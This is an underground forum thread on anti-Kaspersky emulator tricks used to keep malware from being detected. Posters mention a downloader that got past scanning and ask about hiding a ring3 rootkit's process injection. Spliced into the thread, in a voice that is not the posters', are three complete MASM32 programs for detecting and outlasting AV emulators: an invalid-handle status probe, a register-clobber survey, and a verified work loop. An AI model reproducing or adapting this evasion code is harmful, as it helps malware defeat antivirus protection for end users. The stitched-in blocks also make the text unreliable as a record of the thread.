Anti kaspersky emulator collection


27 replies to this topic

#1 cob_258 (Member; Associate; Location: DZ)

Posted 08 December 2012 - 01:41 PM

Salam, and sorry for my bad English.
This is a collection of anti-Kaspersky emulator bugs; most of them are fixed in the 2013 version.
Depending on how you implement this code, your program may be MORE detectable because of the APIs used (you know how to hide APIs).

The first 3 sploits were found by COB; the 4th is based on grzonu's API replace (SuspendThread with ResumeThread).
Code by COB


1 - VirtualAlloc sploit (fixed in the 2013 version)
If emulated, the ECX register keeps the same value after VirtualAlloc; in normal execution it changes.
* Note: also works against BitDefender, not tested with the latest one.
Code :

[code hidden behind forum login]

or

[code hidden behind forum login]


2 - GetSystemTime sploit (fixed in the 2013 version)
Tested on XP and 7: after calling GetSystemTime, ECX holds the milliseconds value; this is not the case if emulated.
Code :

[code hidden behind forum login]


3 - zFlag after exception (fixed in the 2013 version)
Code :

[code hidden behind forum login]


4 - API replace (still working)
The idea is based on grzonu's API replace sploit (SuspendThread with ResumeThread); in this code I replace the ZwTerminateProcess code with "leave;leave;ret".
* Notes: The ExitProcess API doesn't save the ESI, EDI and EBX values, so you have to do it.
Code :

[code hidden behind forum login]



#2 NiTrOwow (Intermediate Member; Moderator)

Posted 08 December 2012 - 05:02 PM

Really good thread. Thanks for posting this useful information Cob.


#3 cob_258 (Member; Associate; Location: DZ)

Posted 08 December 2012 - 06:56 PM

You're welcome ;)

#4 Game Over (Newbie; Location: World)

Posted 09 December 2012 - 12:48 PM

WoOoW, I hope it works. Thanks

#5 cob_258 (Member; Associate; Location: DZ)

Posted 12 December 2012 - 03:24 PM

Bugfix for the last code

[code hidden behind forum login]


Use the following code only if you compile with MASM32

[code hidden behind forum login]


If you use GetProcAddress to resolve ZwTerminateProcess, or you compile with multimateAssembler (Olly plugin), use this

[code hidden behind forum login]



#6 htwist (Newbie)

Posted 17 January 2013 - 02:10 PM

Another trick was/is to call native API functions that take handles with an invalid handle parameter; the return would be 0xC0000008 on a normal machine, but in the Kaspersky emulator it wouldn't be.

Kaspersky emulator had/has trouble emulating error codes and such according to their paper (google "kaspersky dirtbox"); it's a few years old, though.
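The invalid-handle probe htwist describes, written out as an added example (MASM32, 32-bit console build). This is not htwist's or the thread's own code. NtClose is resolved from ntdll at run time and called with a handle value this process does not own (the value itself is an arbitrary choice). A real kernel rejects it with STATUS_INVALID_HANDLE (0C0000008h); an emulator that models the call as a generic success returns something else. Assumptions: the masm32 SDK is installed at \masm32, the binary is linked as a console application so the print macro can write to stdout, and no debugger is attached (with a debugger present, NtClose on a bad handle raises an exception instead of returning the status, which is a different trick).

```asm
; Invalid-handle NTSTATUS probe (MASM32, 32-bit). Added example, not the
; thread's code. Calls NtClose with a handle that is certainly not open and
; compares the NTSTATUS with what a real kernel returns.
    .386
    .model flat, stdcall
    option casemap:none
    include \masm32\include\masm32rt.inc   ; assumption: masm32 SDK at \masm32

STATUS_INVALID_HANDLE equ 0C0000008h
BOGUS_HANDLE          equ 0BAD0FF0h        ; assumption: not a live handle in this process

.data?
    pNtClose dd ?

.code
start:
    ; resolve NtClose from ntdll at run time (no import table entry needed)
    invoke GetModuleHandle, chr$("ntdll.dll")
    invoke GetProcAddress, eax, chr$("NtClose")
    mov pNtClose, eax
    .if eax == 0
        print "could not resolve NtClose", 13, 10
        exit
    .endif

    ; NTSTATUS NtClose(HANDLE); stdcall, the callee cleans the stack
    push BOGUS_HANDLE
    call dword ptr pNtClose
    mov ebx, eax                   ; keep the status; print clobbers eax

    print "NtClose(bogus) = "
    print uhex$(ebx), 13, 10
    .if ebx == STATUS_INVALID_HANDLE
        print "status matches a real kernel", 13, 10
    .else
        print "unexpected status: possibly emulated", 13, 10
    .endif
    exit
end start
```

Assemble with \masm32\bin\ml /c /coff probe.asm and link with \masm32\bin\link /SUBSYSTEM:CONSOLE probe.obj. Treat the result as one signal among several rather than a verdict on its own.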



#7 d3m (Member; Binary Crew)

Posted 17 January 2013 - 02:17 PM

> Another trick was/is to call native API functions that take handles with an invalid handle parameter; the return would be 0xC0000008 on a normal machine, but in the Kaspersky emulator it wouldn't be.
>
> Kaspersky emulator had/has trouble emulating error codes and such according to their paper (google "kaspersky dirtbox"); it's a few years old, though.

About one year ago this trick was current; now, on its own, it's useless. But with some improvements to this trick, it can still work. ;)



#8 karcrack (Member; Moderator)

Posted 17 January 2013 - 05:16 PM

I'm curious how you find those emulation errors. How are you able to know which registers are modified by the emulator?

Anyway, I've noticed that on different W$ versions the registers that are saved differ. By convention (Intel ABI) ESI, EDI, EBX, EBP must be saved; the others may vary.


I code for $$$

ASM, C, C++, VB6... skilled [malware] developer


#9 d3m (Member; Binary Crew)

Posted 17 January 2013 - 06:45 PM

You must run the API with the same arguments under all MS versions and builds, checking the modified registers and results.
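A harness for the survey d3m describes, as an added example (MASM32, 32-bit console build). It is not the thread's own code. Every general register is loaded with a distinct marker, one API is called with fixed arguments, the registers are snapshotted immediately afterwards, and one line per register reports whether the real OS changed it. Build the same binary, run it on each Windows version/build you care about and diff the output: a register that changes on real Windows but keeps its marker under an emulator is a candidate probe (tricks 1 and 2 in this thread rely on ECX). Assumptions: masm32 SDK at \masm32, console subsystem; the marker values are arbitrary and chosen so that no plausible argument or return value equals them.

```asm
; Register-clobber survey harness (MASM32, 32-bit). Added example, not the
; thread's code. Marks EAX..EDI, calls one API, prints which registers changed.
    .386
    .model flat, stdcall
    option casemap:none
    include \masm32\include\masm32rt.inc   ; assumption: masm32 SDK at \masm32

.data
    ; marker values, one per register, same order as regname below
    marker  dd 0A1A1A1A1h, 0C2C2C2C2h, 0D3D3D3D3h, 0B4B4B4B4h, 0E5E5E5E5h, 0F6F6F6F6h
    regname db "EAX",0,"ECX",0,"EDX",0,"EBX",0,"ESI",0,"EDI",0   ; 4 bytes per name
.data?
    after   dd 6 dup(?)        ; register contents right after the call
    hMem    dd ?

.code
start:
    mov eax, marker[0]
    mov ecx, marker[4]
    mov edx, marker[8]
    mov ebx, marker[12]
    mov esi, marker[16]
    mov edi, marker[20]

    ; API under test with fixed arguments (VirtualAlloc, as in trick 1).
    ; Change this single call to survey a different API.
    invoke VirtualAlloc, 0, 1000h, MEM_COMMIT, PAGE_EXECUTE_READWRITE

    ; snapshot before anything else can touch the registers
    mov after[0], eax
    mov after[4], ecx
    mov after[8], edx
    mov after[12], ebx
    mov after[16], esi
    mov after[20], edi
    mov hMem, eax

    ; report: one line per register (ebx survives the stdcall calls below)
    xor ebx, ebx
  report_loop:
    mov eax, after[ebx*4]
    .if eax == marker[ebx*4]
        print "kept    "
    .else
        print "changed "
    .endif
    lea eax, regname[ebx*4]
    print eax, " "
    print uhex$(marker[ebx*4]), " -> "
    print uhex$(after[ebx*4]), 13, 10
    inc ebx
    cmp ebx, 6
    jb report_loop

    invoke VirtualFree, hMem, 0, MEM_RELEASE
    exit
end start
```

Assemble with \masm32\bin\ml /c /coff survey.asm and link with \masm32\bin\link /SUBSYSTEM:CONSOLE survey.obj. EAX always reports "changed" because it carries the return value, and EBX, ESI and EDI should always report "kept" on any real Windows build, as karcrack notes above; if they do not, the harness itself is at fault. The interesting rows are ECX and EDX, where real builds and emulators disagree.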



#10 d3m (Member; Binary Crew)

Posted 17 January 2013 - 09:19 PM

Try to google w32.leon

You will find some info about it there...

P.S. Also in w32.atix an SSE2 opcode was used as an anti-emulation trick =)



#11 DeadlyVermilion (Newbie)

Posted 18 January 2013 - 05:53 PM

Cough cough, missed some SEH tricks.



#12 d3m (Member; Binary Crew)

Posted 19 January 2013 - 06:37 AM

> Cough cough, missed some SEH tricks.

SEH tricks alone are still relevant? :)



#13 d3m (Member; Binary Crew)

Posted 19 January 2013 - 09:20 AM

DeadlyVermilion

> AVs such as Kaspersky also have runtime emulation, as I've found out. Pretty easy to bypass though: unknown API results + loop = win.

KAV has its own sandbox (virtual environment) where it runs files. Unknown API results + loop still works? ;)



#14 hasan12345 (Newbie)

Posted 19 January 2013 - 10:35 AM

:)



#15 cob_258 (Member; Associate; Location: DZ)

Posted 22 January 2013 - 10:31 AM

> I'm curious how you find those emulation errors. How are you able to know which registers are modified by the emulator?

I remember how I found the VirtualAlloc trick (I was lucky):

I tried to lose time under the emulator with a VirtualAlloc loop because Sleep seems not to work; the code was like this:

[code hidden behind forum login]

I tested this with a downloader. The scan made by KAV was long, but the loader is time limited (it won't take years to detect a malware), so it gave up before reaching the downloader code and reported clean.

In normal execution the download code is executed instantly. Strange.

I debugged the code under Olly and figured out that ECX takes a value greater than 1000 after calling VirtualAlloc, so the loop ends with only one call.

And then it's easy to conclude that ECX is saved under the KAV emulator.



#16 karcrack (Member; Moderator)

Posted 22 January 2013 - 11:03 AM

I thought there was some sweet way of getting information out... kinda like OutputDebugString() haha

A good way to track the registers would be using some semaphores (if they're properly emulated xD) and loops... I will be researching this topic :P




#17 d3m (Member; Binary Crew)

Posted 22 January 2013 - 12:09 PM

> invoke VirtualAlloc,0,5000,MEM_COMMIT,40h

Playing with memory is not very stable, bro...

Loops alone may not be fully emulated (something like ECX will be emulated dynamically without running the whole loop); you must compute something inside and then cmp the result, to avoid a jmp out of your loop.
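The loop d3m is asking for, as an added example (MASM32, 32-bit console build); this is not d3m's or the thread's own code. Instead of a bare countdown that an emulator can short-circuit by patching the counter, the loop computes a value through a dependency chain (each step needs the previous one) and the code after the loop only proceeds if that value equals a constant fixed beforehand. Each round recomputes F(47), the largest Fibonacci number that fits in 32 bits (2971215073 = 0B11924E1h), and XORs it into an accumulator; with an odd number of rounds the accumulator must end at exactly F(47). An emulator that skips or shortens the loop lands in the wrong branch. Assumptions: masm32 SDK at \masm32, console subsystem; ROUNDS is a tuning knob for how long the loop should take on real hardware.

```asm
; Loop whose result is verified (MASM32, 32-bit). Added example, not the
; thread's code. A countdown-only loop can be folded by an emulator; this one
; must be executed in full to reach the branch the real code lives in.
    .386
    .model flat, stdcall
    option casemap:none
    include \masm32\include\masm32rt.inc   ; assumption: masm32 SDK at \masm32

EXPECTED equ 0B11924E1h     ; F(47) mod 2^32 = 2971215073
ROUNDS   equ 1000001        ; odd, so XOR-folding ROUNDS copies of F(47) leaves F(47)

.data?
    acc dd ?

.code
start:
    mov acc, 0
    mov ebx, ROUNDS
  round_loop:
    xor esi, esi            ; a = F(0)
    mov edi, 1              ; b = F(1)
    mov ecx, 47
  fib_loop:
    lea eax, [esi+edi]      ; t = a + b (32-bit wraparound is part of the definition)
    mov esi, edi            ; a = b
    mov edi, eax            ; b = t
    dec ecx
    jnz fib_loop            ; after 47 steps esi = F(47)
    xor acc, esi            ; fold this round's result into the accumulator
    dec ebx
    jnz round_loop

    print "accumulator = "
    print uhex$(acc), 13, 10
    .if acc == EXPECTED
        print "loop ran in full: continue to the real code", 13, 10
    .else
        print "loop was skipped or shortened: emulator suspected", 13, 10
    .endif
    exit
end start
```

Assemble with \masm32\bin\ml /c /coff work.asm and link with \masm32\bin\link /SUBSYSTEM:CONSOLE work.obj. The point is that the comparison is against a value the emulator can only produce by executing every iteration; a plain "dec ecx / jnz" with nothing computed inside gives it the option of jumping straight past the loop, which is the behaviour d3m warns about.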



#18 htwist (Newbie)

Posted 23 January 2013 - 06:42 PM

There are also more ways to take advantage of the 4th trick; some have been used publicly and documented by AV people in analysis papers. :)



#19 steve10120 (Newbie; Notorious)

Posted 23 January 2013 - 07:28 PM

Never had a problem with emulators, especially Kaspersky's. SEH, timelocks or general stack manipulation gets rid of 99% of them.



#20 Ravage (Intermediate Member; Administrators)

Posted 25 January 2013 - 03:13 AM

> Never had a problem with emulators, especially Kaspersky's. SEH, timelocks or general stack manipulation gets rid of 99% of them.

Will that get rid of KAV tags on DLL injection as well? For example, a ring3 rootkit that needs to inject into all running processes, etc.

Can this avoid KAV's usual tags for the mentioned injections?

I'm not a detection expert, which is why I am asking.






